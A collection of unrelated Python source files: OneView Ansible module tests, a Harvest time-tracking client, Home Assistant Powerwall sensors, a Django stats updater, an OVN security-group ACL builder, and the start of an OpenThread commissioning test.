'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'profileUri': PROFILE_URI
}
}
]
)
@pytest.mark.resource(TestServerProfileFactsModule='server_profiles')
class TestServerProfileFactsModule(OneViewBaseFactsTest):
"""
FactsParamsTestCase has common tests for the parameters support.
"""
def test_should_get_all_servers(self):
server_profiles = [
{"name": "Server Profile Name 1"},
{"name": "Server Profile Name 2"}
]
self.mock_ov_client.server_profiles.get_all.return_value = server_profiles
self.mock_ansible_module.params = deepcopy(PARAMS_GET_ALL)
ServerProfileFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(server_profiles=server_profiles)
)
def test_should_get_by_name(self):
servers = {"name": "Server Profile Name", 'uri': '/rest/test/123'}
obj = mock.Mock()
obj.data = servers
self.mock_ov_client.server_profiles.get_by_name.return_value = obj
self.mock_ansible_module.params = deepcopy(PARAMS_GET_BY_NAME)
ServerProfileFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(server_profiles=[servers])
)
def test_should_get_by_uri(self):
server_profile = {"name": "Server Profile Name", 'uri': '/rest/test/123'}
obj = mock.Mock()
obj.data = server_profile
self.mock_ov_client.server_profiles.get_by_uri.return_value = obj
self.mock_ansible_module.params = deepcopy(PARAMS_GET_BY_URI)
ServerProfileFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(server_profiles=[server_profile])
)
def test_should_get_server_profile_by_name_with_all_options(self):
mock_option_return = {'subresource': 'value'}
self.mock_ov_client.server_profiles.data = {"name": "Server Profile Name", "uri": PROFILE_URI}
self.mock_ov_client.server_profiles.get_by_name.return_value = self.mock_ov_client.server_profiles
self.mock_ov_client.server_profiles.get_messages.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_transformation.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_compliance_preview.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_new_profile_template.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_schema.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_profile_ports.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_networks.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_servers.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_storage_system.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_storage_systems.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_targets.return_value = mock_option_return
self.mock_ansible_module.params = deepcopy(PARAMS_WITH_OPTIONS)
ServerProfileFactsModule().run()
self.mock_ov_client.server_profiles.get_messages.assert_called_once_with()
self.mock_ov_client.server_profiles.get_transformation.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI, serverHardwareTypeUri=HARDWARE_TYPE_URI,
serverHardwareUri=HARDWARE_URI)
self.mock_ov_client.server_profiles.get_compliance_preview.assert_called_once_with()
self.mock_ov_client.server_profiles.get_new_profile_template.assert_called_once_with()
self.mock_ov_client.server_profiles.get_schema.assert_called_once_with()
self.mock_ov_client.server_profiles.get_profile_ports.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI,
serverHardwareTypeUri=HARDWARE_TYPE_URI, serverHardwareUri=HARDWARE_URI, )
self.mock_ov_client.server_profiles.get_available_networks.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI,
serverHardwareTypeUri=HARDWARE_TYPE_URI, serverHardwareUri=HARDWARE_URI, view='FibreChannel')
self.mock_ov_client.server_profiles.get_available_servers.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI,
serverHardwareTypeUri=HARDWARE_TYPE_URI, profileUri=PROFILE_URI)
self.mock_ov_client.server_profiles.get_available_storage_system.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI,
serverHardwareTypeUri=HARDWARE_TYPE_URI, storageSystemId=STORAGE_SYSTEM_ID)
self.mock_ov_client.server_profiles.get_available_storage_systems.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI, serverHardwareTypeUri=HARDWARE_TYPE_URI, start=1, count=15,
filter="\"'status'='OK'\"", sort="name:ascending")
self.mock_ov_client.server_profiles.get_available_servers.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI, profileUri=PROFILE_URI, serverHardwareTypeUri=HARDWARE_TYPE_URI)
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts={'server_profiles': [{'name': 'Server Profile Name', 'uri': PROFILE_URI}],
'server_profile_schema': mock_option_return,
'server_profile_compliance_preview': mock_option_return,
'server_profile_new_profile_template': mock_option_return,
'server_profile_profile_ports': mock_option_return,
'server_profile_messages': mock_option_return,
'server_profile_transformation': mock_option_return,
'server_profile_available_networks': mock_option_return,
'server_profile_available_servers': mock_option_return,
'server_profile_available_storage_system': mock_option_return,
'server_profile_available_storage_systems': mock_option_return,
'server_profile_available_targets': mock_option_return,
}
)
def test_should_get_all_server_profiles_with_options(self):
mock_option_return = {'subresource': 'value'}
params_get_all_options = deepcopy(PARAMS_WITH_OPTIONS)
del params_get_all_options['name']
self.mock_ov_client.server_profiles.get_all.return_value = [{"name": "Server Profile Name", "uri": PROFILE_URI}]
self.mock_ov_client.server_profiles.get_schema.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_profile_ports.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_networks.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_servers.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_storage_system.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_storage_systems.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_targets.return_value = mock_option_return
self.mock_ansible_module.params = deepcopy(params_get_all_options)
ServerProfileFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts={'server_profiles': [{'name': 'Server Profile Name', 'uri': PROFILE_URI}],
'server_profile_schema': mock_option_return,
'server_profile_profile_ports': mock_option_return,
'server_profile_available_networks': mock_option_return,
'server_profile_available_servers': mock_option_return,
'server_profile_available_storage_system': mock_option_return,
'server_profile_available_storage_systems': mock_option_return,
'server_profile_available_targets': mock_option_return,
}
)
def test_should_get_server_profiles_with_invalid_profile_ports_option(self):
mock_option_return = {'subresource': 'value'}
obj = mock.Mock()
obj.data = {"name": "Server Profile Name", "uri": PROFILE_URI}
self.mock_ov_client.server_profiles.get_by_name.return_value = obj
self.mock_ov_client.server_profiles.get_profile_ports.return_value = mock_option_return
self.mock_ansible_module.params = dict(
config='config.json',
name="Test Server Profile",
options=[
{'profilePorts': [1]}
])
ServerProfileFactsModule().run()
self.mock_ov_client.server_profiles.get_profile_ports.assert_called_once_with()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts={'server_profiles': [{'name': 'Server Profile Name', 'uri': PROFILE_URI}],
'server_profile_profile_ports': mock_option_return,
}
)
if __name__ == '__main__':
pytest.main([__file__])
|
py | b4104a8239bffe49a06ee72cf9294cf369114762 | '''
>>> import Harvest
>>> Harvest.HarvestStatus().get()
u'up'
>>> harvest = Harvest.Harvest("https://COMPANYNAME.harvestapp.com", "EMAIL", "PASSWORD")
>>> data = {"notes":"test note", "project_id":"PROJECT_ID","hours":"1.0", "task_id": "TASK_ID"}
>>> harvest.add(data)
>>> data['notes'] = "another test"
>>> harvest.update("ENTRY_ID", data)
>>> harvest.get_today()
'''
from xml.dom.minidom import Document #to create xml out of dict
import requests
from requests.auth import HTTPBasicAuth
class HarvestError(Exception):
pass
class Harvest(object):
def __init__(self, uri, email, password):
self.uri = uri
self.email = email
self.password = password
self.headers = {
'Accept': 'application/json',
'User-Agent': 'TimeTracker for Linux',
}
def status(self):
return self._request("GET", 'http://harveststatus.com/status.json')
def get_today(self):
return self._request('GET', "%s/daily" % self.uri)
def get_day(self, day_of_the_year=1, year=2012):
return self._request('GET', '%s/daily/%s/%s' % (self.uri, day_of_the_year, year))
def get_entry(self, entry_id):
return self._request("GET", "%s/daily/show/%s" % (self.uri, entry_id))
def toggle_timer(self, entry_id):
return self._request("GET", "%s/daily/timer/%s" % (self.uri, entry_id))
def add(self, data):
return self._request("POST", '%s/daily/add' % self.uri, data)
def delete(self, entry_id):
return self._request("DELETE", "%s/daily/delete/%s" % (self.uri, entry_id))
def update(self, entry_id, data):
return self._request('POST', '%s/daily/update/%s' % (self.uri, entry_id), data)
def _request(self, type = "GET", url = "", data = None):
if type != "DELETE":
if data:
r = requests.post(url, data=data, headers=self.headers, auth=HTTPBasicAuth(self.email, self.password))
else:
if not url.endswith(".json"): #dont put headers it a status request
r = requests.get(url=url, headers=self.headers, auth=HTTPBasicAuth(self.email, self.password))
else:
r = requests.get(url)
try:
return r.json
except Exception as e:
raise HarvestError(e)
else:
try:
r = requests.delete(url, headers=self.headers, auth=HTTPBasicAuth(self.email, self.password))
except Exception as e:
raise HarvestError(e)
class HarvestStatus(Harvest):
def __init__(self):
self.harvest = Harvest("", "", "").status()
def get(self):
return self.harvest['status']
|
py | b4104b70f39d37b557a9511aa1f06b6269b23934 | """Support for powerwall binary sensors."""
from tesla_powerwall import GridStatus, MeterType
from homeassistant.components.binary_sensor import (
DEVICE_CLASS_BATTERY_CHARGING,
DEVICE_CLASS_CONNECTIVITY,
BinarySensorEntity,
)
from homeassistant.const import DEVICE_CLASS_POWER
from .const import (
DOMAIN,
POWERWALL_API_DEVICE_TYPE,
POWERWALL_API_GRID_SERVICES_ACTIVE,
POWERWALL_API_GRID_STATUS,
POWERWALL_API_METERS,
POWERWALL_API_SERIAL_NUMBERS,
POWERWALL_API_SITE_INFO,
POWERWALL_API_SITEMASTER,
POWERWALL_API_STATUS,
POWERWALL_COORDINATOR,
)
from .entity import PowerWallEntity
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the August sensors."""
powerwall_data = hass.data[DOMAIN][config_entry.entry_id]
coordinator = powerwall_data[POWERWALL_COORDINATOR]
site_info = powerwall_data[POWERWALL_API_SITE_INFO]
device_type = powerwall_data[POWERWALL_API_DEVICE_TYPE]
status = powerwall_data[POWERWALL_API_STATUS]
powerwalls_serial_numbers = powerwall_data[POWERWALL_API_SERIAL_NUMBERS]
entities = []
for sensor_class in (
PowerWallRunningSensor,
PowerWallGridServicesActiveSensor,
PowerWallGridStatusSensor,
PowerWallConnectedSensor,
PowerWallChargingStatusSensor,
):
entities.append(
sensor_class(
coordinator, site_info, status, device_type, powerwalls_serial_numbers
)
)
async_add_entities(entities, True)
class PowerWallRunningSensor(PowerWallEntity, BinarySensorEntity):
"""Representation of an Powerwall running sensor."""
@property
def name(self):
"""Device Name."""
return "Powerwall Status"
@property
def device_class(self):
"""Device Class."""
return DEVICE_CLASS_POWER
@property
def unique_id(self):
"""Device Uniqueid."""
return f"{self.base_unique_id}_running"
@property
def is_on(self):
"""Get the powerwall running state."""
return self.coordinator.data[POWERWALL_API_SITEMASTER].is_running
class PowerWallConnectedSensor(PowerWallEntity, BinarySensorEntity):
"""Representation of an Powerwall connected sensor."""
@property
def name(self):
"""Device Name."""
return "Powerwall Connected to Tesla"
@property
def device_class(self):
"""Device Class."""
return DEVICE_CLASS_CONNECTIVITY
@property
def unique_id(self):
"""Device Uniqueid."""
return f"{self.base_unique_id}_connected_to_tesla"
@property
def is_on(self):
"""Get the powerwall connected to tesla state."""
return self.coordinator.data[POWERWALL_API_SITEMASTER].is_connected_to_tesla
class PowerWallGridServicesActiveSensor(PowerWallEntity, BinarySensorEntity):
"""Representation of a Powerwall grid services active sensor."""
@property
def name(self):
"""Device Name."""
return "Grid Services Active"
@property
def device_class(self):
"""Device Class."""
return DEVICE_CLASS_POWER
@property
def unique_id(self):
"""Device Uniqueid."""
return f"{self.base_unique_id}_grid_services_active"
@property
def is_on(self):
"""Grid services is active."""
return self.coordinator.data[POWERWALL_API_GRID_SERVICES_ACTIVE]
class PowerWallGridStatusSensor(PowerWallEntity, BinarySensorEntity):
"""Representation of an Powerwall grid status sensor."""
@property
def name(self):
"""Device Name."""
return "Grid Status"
@property
def device_class(self):
"""Device Class."""
return DEVICE_CLASS_POWER
@property
def unique_id(self):
"""Device Uniqueid."""
return f"{self.base_unique_id}_grid_status"
@property
def is_on(self):
"""Grid is online."""
return self.coordinator.data[POWERWALL_API_GRID_STATUS] == GridStatus.CONNECTED
class PowerWallChargingStatusSensor(PowerWallEntity, BinarySensorEntity):
"""Representation of an Powerwall charging status sensor."""
@property
def name(self):
"""Device Name."""
return "Powerwall Charging"
@property
def device_class(self):
"""Device Class."""
return DEVICE_CLASS_BATTERY_CHARGING
@property
def unique_id(self):
"""Device Uniqueid."""
return f"{self.base_unique_id}_powerwall_charging"
@property
def is_on(self):
"""Powerwall is charging."""
# is_sending_to returns true for values greater than 100 watts
return (
self.coordinator.data[POWERWALL_API_METERS]
.get_meter(MeterType.BATTERY)
.is_sending_to()
)
|
py | b4104bbe5d75ec10f806a3a715ca58815e205319 | from datetime import datetime, timedelta
from django.db.models import Sum
from django.utils.timezone import make_aware
from ..models import Face, Subject, Task, Frame, VideoRecord, Camera, Stat
def update_total_stats():
def faces_image_size():
result = Face.objects.all().aggregate(
Sum('size_bytes'))['size_bytes__sum']
return result if result is not None else 0
def frames_image_size():
result = Frame.objects.all().aggregate(
Sum('size_bytes'))['size_bytes__sum']
return result if result is not None else 0
def videos_size():
result = VideoRecord.objects.all().aggregate(
Sum('size_bytes'))['size_bytes__sum']
return result if result is not None else 0
def stored_subjects_eval():
# return randint(0, 50)
result = Subject.objects.filter().count()
return result
def stored_faces_eval():
# return randint(0, 50)
result = Face.objects.filter().count()
return result
def stored_frames_eval():
# return randint(0, 50)
result = Frame.objects.filter().count()
return result
def stored_cameras_eval():
# return randint(0, 50)
result = Camera.objects.filter().count()
return result
def stored_videos_eval():
# return randint(0, 50)
result = VideoRecord.objects.filter().count()
return result
def stored_tasks_eval():
# return randint(0, 50)
result = Task.objects.filter().count()
return result
stats_kwargs = [
{
'name': 'faces_image_size',
'value_eval': faces_image_size
}, {
'name': 'frames_image_size',
'value_eval': frames_image_size
}, {
'name': 'videos_size',
'value_eval': videos_size
}, {
'name': 'stored_subjects',
'value_eval': stored_subjects_eval
}, {
'name': 'stored_faces',
'value_eval': stored_faces_eval
}, {
'name': 'stored_frames',
'value_eval': stored_frames_eval
}, {
'name': 'stored_cameras',
'value_eval': stored_cameras_eval
}, {
'name': 'stored_videos',
'value_eval': stored_videos_eval
}, {
'name': 'stored_tasks',
'value_eval': stored_tasks_eval
}
]
for stat_kwargs in stats_kwargs:
stat, _ = Stat.objects.get_or_create(
name=stat_kwargs['name'],
resolution=Stat.RESOLUTION_ALL
)
stat.timestamp = make_aware(datetime.now())
stat.value = stat_kwargs['value_eval']()
stat.save()
def update_time_stats(resolution):
def faces_count_eval(min_timestamp, max_timestamp):
# return randint(0, 100)
result = Task.objects.filter(
created_at__gt=min_timestamp,
created_at__lte=max_timestamp
).aggregate(Sum('faces_count'))['faces_count__sum']
return result if result is not None else 0
def frames_count_eval(min_timestamp, max_timestamp):
# return randint(0, 1000)
result = Task.objects.filter(
created_at__gt=min_timestamp,
created_at__lte=max_timestamp
).aggregate(Sum('frames_count'))['frames_count__sum']
return result if result is not None else 0
def processing_time_eval(min_timestamp, max_timestamp):
# return 7200 * random() + 1800
result = Task.objects.filter(
created_at__gt=min_timestamp,
created_at__lte=max_timestamp
).aggregate(Sum('processing_time'))['processing_time__sum']
return result if result is not None else 0
def tasks_count_eval(min_timestamp, max_timestamp):
# return 7200 * random() + 1800
result = Task.objects.filter(
created_at__gt=min_timestamp,
created_at__lte=max_timestamp,
status__in=[Task.STATUS_SUCCESS, Task.STATUS_STOPPED, Task.STATUS_KILLED]
).distinct().count()
return result if result is not None else 0
stats_kwargs = [
{
'name': 'faces_count',
'value_eval': faces_count_eval
}, {
'name': 'frames_count',
'value_eval': frames_count_eval
}, {
'name': 'processing_time',
'value_eval': processing_time_eval
}, {
'name': 'tasks_count',
'value_eval': tasks_count_eval
}
]
for stat_kwargs in stats_kwargs:
update_stat(resolution=resolution, **stat_kwargs)
def update_stat(name: str, resolution: str, value_eval: callable):
if resolution == Stat.RESOLUTION_HOUR:
replace_kwargs = {
'minute': 0,
'second': 0,
'microsecond': 0
}
backward_kwargs = {'hours': 24}
forward_kwargs = {'hours': 1}
elif resolution == Stat.RESOLUTION_DAY:
replace_kwargs = {
'hour': 0,
'minute': 0,
'second': 0,
'microsecond': 0
}
backward_kwargs = {'days': 30}
forward_kwargs = {'hours': 24}
else:
raise ValueError(f'Invalid resolution "{resolution}"')
query = Stat.objects.filter(
name=name,
resolution=resolution
).order_by('-timestamp')
last_stat = None
if query.exists():
last_stat = query.last()
now = make_aware(datetime.now())
now = now.replace(**replace_kwargs)
min_timestamp = now - timedelta(**backward_kwargs)
if not last_stat:
last_update_at = min_timestamp
else:
last_update_at = last_stat.timestamp.replace(**replace_kwargs)
if last_update_at < min_timestamp:
last_update_at = min_timestamp
stats_query = Stat.objects.filter(
name=name,
resolution=resolution,
timestamp__lte=min_timestamp
)
if stats_query.exists():
stats_query.delete()
# count = Face.objects.filter(
# created_at__gt=last_update_at
# ).count()
#
# if count == 0:
# return
timestamp_prev = last_update_at
timestamp = last_update_at + timedelta(**forward_kwargs)
while timestamp <= now:
value = value_eval(min_timestamp=timestamp_prev, max_timestamp=timestamp)
# value = Face.objects.filter(
# created_at__gt=timestamp_prev,
# created_at__lte=timestamp
# ).count()
stat, _ = Stat.objects.get_or_create(
name=name,
resolution=resolution,
timestamp=timestamp
)
stat.value = value
stat.save()
timestamp_prev = timestamp
timestamp = timestamp + timedelta(**forward_kwargs) |
py | b4104cff22a73fe3e50768f05867a525a03d4461 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import netaddr
#from neutron_lib import constants as const
from networking_ovn.neutron_lib import constants as const
from oslo_config import cfg
from networking_ovn.common import config
from networking_ovn.common import constants as ovn_const
from networking_ovn.common import utils
def is_sg_enabled():
return cfg.CONF.SECURITYGROUP.enable_security_group
def acl_direction(r, port):
if r['direction'] == 'ingress':
portdir = 'outport'
else:
portdir = 'inport'
return '%s == "%s"' % (portdir, port['id'])
def acl_ethertype(r):
match = ''
ip_version = None
icmp = None
if r['ethertype'] == 'IPv4':
match = ' && ip4'
ip_version = 'ip4'
icmp = 'icmp4'
elif r['ethertype'] == 'IPv6':
match = ' && ip6'
ip_version = 'ip6'
icmp = 'icmp6'
return match, ip_version, icmp
def acl_remote_ip_prefix(r, ip_version):
if not r['remote_ip_prefix']:
return ''
src_or_dst = 'src' if r['direction'] == 'ingress' else 'dst'
return ' && %s.%s == %s' % (ip_version, src_or_dst,
r['remote_ip_prefix'])
def acl_protocol_and_ports(r, icmp):
protocol = None
match = ''
if r['protocol'] in ('tcp', 'udp',
str(const.PROTO_NUM_TCP),
str(const.PROTO_NUM_UDP)):
# OVN expects the protocol name not number
if r['protocol'] == str(const.PROTO_NUM_TCP):
protocol = 'tcp'
elif r['protocol'] == str(const.PROTO_NUM_UDP):
protocol = 'udp'
else:
protocol = r['protocol']
port_match = '%s.dst' % protocol
elif r.get('protocol') in (const.PROTO_NAME_ICMP,
const.PROTO_NAME_IPV6_ICMP,
const.PROTO_NAME_IPV6_ICMP_LEGACY,
str(const.PROTO_NUM_ICMP),
str(const.PROTO_NUM_IPV6_ICMP)):
protocol = icmp
port_match = '%s.type' % icmp
if protocol:
match += ' && %s' % protocol
# If min or max are set to -1, then we just treat it like it wasn't
# specified at all and don't match on it.
min_port = -1 if r['port_range_min'] is None else r['port_range_min']
max_port = -1 if r['port_range_max'] is None else r['port_range_max']
if protocol != icmp:
if (min_port > -1 and min_port == max_port):
match += ' && %s == %d' % (port_match, min_port)
else:
if min_port > -1:
match += ' && %s >= %d' % (port_match, min_port)
if max_port > -1:
match += ' && %s <= %d' % (port_match, max_port)
# It's invalid to create security group rule for ICMP and ICMPv6 with
# ICMP(v6) code but without ICMP(v6) type.
elif protocol == icmp and min_port > -1:
match += ' && %s == %d' % (port_match, min_port)
if max_port > -1:
match += ' && %s.code == %s' % (icmp, max_port)
return match
def drop_all_ip_traffic_for_port(port):
acl_list = []
for direction, p in (('from-lport', 'inport'),
('to-lport', 'outport')):
lswitch = utils.ovn_name(port['network_id'])
lport = port['id']
acl = {"lswitch": lswitch, "lport": lport,
"priority": ovn_const.ACL_PRIORITY_DROP,
"action": ovn_const.ACL_ACTION_DROP,
"log": False,
"direction": direction,
"match": '%s == "%s" && ip' % (p, port['id']),
"external_ids": {'neutron:lport': port['id']}}
acl_list.append(acl)
return acl_list
def add_sg_rule_acl_for_port(port, r, match):
dir_map = {
'ingress': 'to-lport',
'egress': 'from-lport',
}
acl = {"lswitch": utils.ovn_name(port['network_id']),
"lport": port['id'],
"priority": ovn_const.ACL_PRIORITY_ALLOW,
"action": ovn_const.ACL_ACTION_ALLOW_RELATED,
"log": False,
"direction": dir_map[r['direction']],
"match": match,
"external_ids": {'neutron:lport': port['id']}}
return acl
def add_acl_dhcp(port, subnet):
# Allow DHCP responses through from source IPs on the local subnet.
# We do this even if DHCP isn't enabled for the subnet. It could be
# enabled later. We could hook into handling when it's enabled/disabled
# for a subnet, but this only used when OVN native DHCP is disabled.
acl_list = []
acl = {"lswitch": utils.ovn_name(port['network_id']),
"lport": port['id'],
"priority": ovn_const.ACL_PRIORITY_ALLOW,
"action": ovn_const.ACL_ACTION_ALLOW,
"log": False,
"direction": 'to-lport',
"match": ('outport == "%s" && ip4 && ip4.src == %s && '
'udp && udp.src == 67 && udp.dst == 68'
) % (port['id'], subnet['cidr']),
"external_ids": {'neutron:lport': port['id']}}
acl_list.append(acl)
acl = {"lswitch": utils.ovn_name(port['network_id']),
"lport": port['id'],
"priority": ovn_const.ACL_PRIORITY_ALLOW,
"action": ovn_const.ACL_ACTION_ALLOW,
"log": False,
"direction": 'from-lport',
"match": ('inport == "%s" && ip4 && '
'(ip4.dst == 255.255.255.255 || '
'ip4.dst == %s) && '
'udp && udp.src == 68 && udp.dst == 67'
) % (port['id'], subnet['cidr']),
"external_ids": {'neutron:lport': port['id']}}
acl_list.append(acl)
return acl_list
def _get_subnet_from_cache(plugin, admin_context, subnet_cache, subnet_id):
if subnet_id in subnet_cache:
return subnet_cache[subnet_id]
else:
subnet = plugin.get_subnet(admin_context, subnet_id)
if subnet:
subnet_cache[subnet_id] = subnet
return subnet
def _get_sg_ports_from_cache(plugin, admin_context, sg_ports_cache, sg_id):
if sg_id in sg_ports_cache:
return sg_ports_cache[sg_id]
else:
filters = {'security_group_id': [sg_id]}
sg_ports = plugin._get_port_security_group_bindings(
admin_context, filters)
if sg_ports:
sg_ports_cache[sg_id] = sg_ports
return sg_ports
def _get_sg_from_cache(plugin, admin_context, sg_cache, sg_id):
if sg_id in sg_cache:
return sg_cache[sg_id]
else:
sg = plugin.get_security_group(admin_context, sg_id)
if sg:
sg_cache[sg_id] = sg
return sg
def acl_remote_group_id(r, ip_version):
if not r['remote_group_id']:
return ''
src_or_dst = 'src' if r['direction'] == 'ingress' else 'dst'
addrset_name = utils.ovn_addrset_name(r['remote_group_id'],
ip_version)
return ' && %s.%s == $%s' % (ip_version, src_or_dst, addrset_name)
def _add_sg_rule_acl_for_port(port, r):
# Update the match based on which direction this rule is for (ingress
# or egress).
match = acl_direction(r, port)
# Update the match for IPv4 vs IPv6.
ip_match, ip_version, icmp = acl_ethertype(r)
match += ip_match
# Update the match if an IPv4 or IPv6 prefix was specified.
match += acl_remote_ip_prefix(r, ip_version)
# Update the match if remote group id was specified.
match += acl_remote_group_id(r, ip_version)
# Update the match for the protocol (tcp, udp, icmp) and port/type
# range if specified.
match += acl_protocol_and_ports(r, icmp)
# Finally, create the ACL entry for the direction specified.
return add_sg_rule_acl_for_port(port, r, match)
def update_acls_for_security_group(plugin,
admin_context,
ovn,
security_group_id,
security_group_rule,
sg_ports_cache=None,
is_add_acl=True):
# Skip ACLs if security groups aren't enabled
if not is_sg_enabled():
return
# Get the security group ports.
sg_ports_cache = sg_ports_cache or {}
sg_ports = _get_sg_ports_from_cache(plugin,
admin_context,
sg_ports_cache,
security_group_id)
# ACLs associated with a security group may span logical switches
sg_port_ids = [binding['port_id'] for binding in sg_ports]
sg_port_ids = list(set(sg_port_ids))
port_list = plugin.get_ports(admin_context,
filters={'id': sg_port_ids})
lswitch_names = set([p['network_id'] for p in port_list])
acl_new_values_dict = {}
# NOTE(lizk): We can directly locate the affected acl records,
# so no need to compare new acl values with existing acl objects.
for port in port_list:
acl = _add_sg_rule_acl_for_port(port, security_group_rule)
if acl:
# Remove lport and lswitch since we don't need them
acl.pop('lport')
acl.pop('lswitch')
acl_new_values_dict[port['id']] = acl
ovn.update_acls(list(lswitch_names),
iter(port_list),
acl_new_values_dict,
need_compare=False,
is_add_acl=is_add_acl).execute(check_error=True)
def add_acls(plugin, admin_context, port, sg_cache, subnet_cache):
acl_list = []
# Skip ACLs if security groups aren't enabled
if not is_sg_enabled():
return acl_list
sec_groups = port.get('security_groups', [])
if not sec_groups:
return acl_list
# Drop all IP traffic to and from the logical port by default.
acl_list += drop_all_ip_traffic_for_port(port)
# Add DHCP ACLs if not using OVN native DHCP.
if not config.is_ovn_dhcp():
port_subnet_ids = set()
for ip in port['fixed_ips']:
if netaddr.IPNetwork(ip['ip_address']).version != 4:
continue
subnet = _get_subnet_from_cache(plugin,
admin_context,
subnet_cache,
ip['subnet_id'])
# Ignore duplicate DHCP ACLs for the subnet.
if subnet['id'] not in port_subnet_ids:
acl_list += add_acl_dhcp(port, subnet)
port_subnet_ids.add(subnet['id'])
# We create an ACL entry for each rule on each security group applied
# to this port.
for sg_id in sec_groups:
sg = _get_sg_from_cache(plugin,
admin_context,
sg_cache,
sg_id)
for r in sg['security_group_rules']:
acl = _add_sg_rule_acl_for_port(port, r)
if acl and acl not in acl_list:
acl_list.append(acl)
return acl_list
def acl_port_ips(port):
# Skip ACLs if security groups aren't enabled
if not is_sg_enabled():
return {'ip4': [], 'ip6': []}
ip_addresses = {4: [], 6: []}
for fixed_ip in port['fixed_ips']:
ip_version = netaddr.IPNetwork(fixed_ip['ip_address']).version
ip_addresses[ip_version].append(fixed_ip['ip_address'])
return {'ip4': ip_addresses[4],
'ip6': ip_addresses[6]}
|
py | b4104dae1b614c9b26bed467bc5c75a3fa4ec488 | #!/usr/bin/env python3
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import unittest
import command
import config
import dtls
import thread_cert
from pktverify.consts import MLE_DISCOVERY_REQUEST, MLE_DISCOVERY_RESPONSE, HANDSHAKE_CLIENT_HELLO, HANDSHAKE_SERVER_HELLO, HANDSHAKE_SERVER_KEY_EXCHANGE, HANDSHAKE_SERVER_HELLO_DONE, HANDSHAKE_CLIENT_KEY_EXCHANGE, HANDSHAKE_HELLO_VERIFY_REQUEST, CONTENT_APPLICATION_DATA, NM_EXTENDED_PAN_ID_TLV, NM_NETWORK_NAME_TLV, NM_STEERING_DATA_TLV, NM_COMMISSIONER_UDP_PORT_TLV, NM_JOINER_UDP_PORT_TLV, NM_DISCOVERY_REQUEST_TLV, NM_DISCOVERY_RESPONSE_TLV, THREAD_DISCOVERY_TLV, CONTENT_CHANGE_CIPHER_SPEC, CONTENT_HANDSHAKE, CONTENT_ALERT
from pktverify.packet_verifier import PacketVerifier
COMMISSIONER = 1
JOINER = 2
# Test Purpose and Description:
# -----------------------------
# The purpose of this test case is to verify the DTLS sessions between the
# on-mesh Commissioner and a Joiner when the correct PSKd is used
#
# Note that many of the messages/records exchanged are encrypted
# and cannot be observe
#
# Test Topology:
# -------------
# Commissioner
# |
# Joiner
#
# DUT Types:
# ----------
# Commissioner
# Joiner
class Cert_8_1_01_Commissioning(thread_cert.TestCase):
SUPPORT_NCP = False
TOPOLOGY = {
COMMISSIONER: {
